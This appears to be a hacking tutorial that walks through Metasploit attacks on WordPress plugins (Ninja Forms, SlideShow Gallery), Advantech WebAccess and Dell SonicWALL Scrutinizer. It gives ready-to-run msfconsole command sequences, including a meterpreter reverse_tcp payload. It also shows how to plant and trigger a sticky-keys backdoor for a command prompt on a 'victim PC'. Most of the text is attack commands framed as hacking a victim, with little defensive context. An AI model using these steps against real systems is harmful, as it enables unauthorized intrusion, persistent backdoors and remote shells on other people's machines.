Hacking Wordpress using Ninja Forms Unauthenticated File Upload

Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.

Exploit Targets

ninja forms 2.9.36

Requirement

Attacker: kali Linux

Victim PC: wordpress

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80

msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit          

Hack Wordpress Server using Wordpress SlideShow Gallery Authenticated File Upload

The Wordpress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it's possible to upload any file type.

Exploit Targets

wordpress

Requirement

Attacker: kali Linux

Victim PC: Wordpress

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_slideshowgallery_upload

msf exploit (wp_slideshowgallery_upload)>set targeturi /

msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)

msf exploit (wp_slideshowgallery_upload)>set rport 80

msf exploit (wp_slideshowgallery_upload)>set wp_user user

msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami

msf exploit (wp_slideshowgallery_upload)>exploit          

Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter

This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server; send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

·         Connects to RDP using rdesktop

·         Sends shift 5 times using xdotool to trigger sethc.exe backdoors

·         Sends Windows+u using xdotool to trigger utilman.exe backdoors

·         Takes screenshot

·         Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session enable the remote desktop option of remote pc using following exploit

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In Next step replace the sticke key with command prompt using following exploit

msf > use post/windows/manage/stickey_keys

msf post(stickey_keys) > set session 2

msf post(stickey_keys) > exploit

Now clone Sticky Keys Hunter repository from github, to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

For scan a single host: ./stickyKeysHunter.sh 192.168.0.120







Now a pop will open like below

Now press shift key 5 times at the login screen now a command prompt will open up

Now you can do anything in victim pc through command prompt. I am using net user command to see the list of active account

Exploit Remote PC using Advantech WebAccess Dashboard Viewer upload Image Common Arbitrary File Upload

This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to upload arbitrary code (instead of an image) to the server, which will then be executed under the high-privilege context of the IIS AppPool.

Exploit Targets

Advantech WebAccess 8.0

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/scada/advantech_webaccess_dashboard_file_upload

msf exploit (advantech_webaccess_dashboard_file_upload)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (advantech_webaccess_dashboard_file_upload)>set rhost 192.168.0.102

msf exploit (advantech_webaccess_dashboard_file_upload)>set rport 80

msf exploit (advantech_webaccess_dashboard_file_upload)>set targeturi /

 msf exploit (advantech_webaccess_dashboard_file_upload)>exploit

Hack Remote Windows PC Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Now type use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set payload windows/meterpreter/reverse_tcp

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set lhost 192.168.0.108 (IP of Local Host)

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>set rhost 192.168.0.120

msf exploit (sonicwall_scrutinizer_methoddetail_sqli)>exploit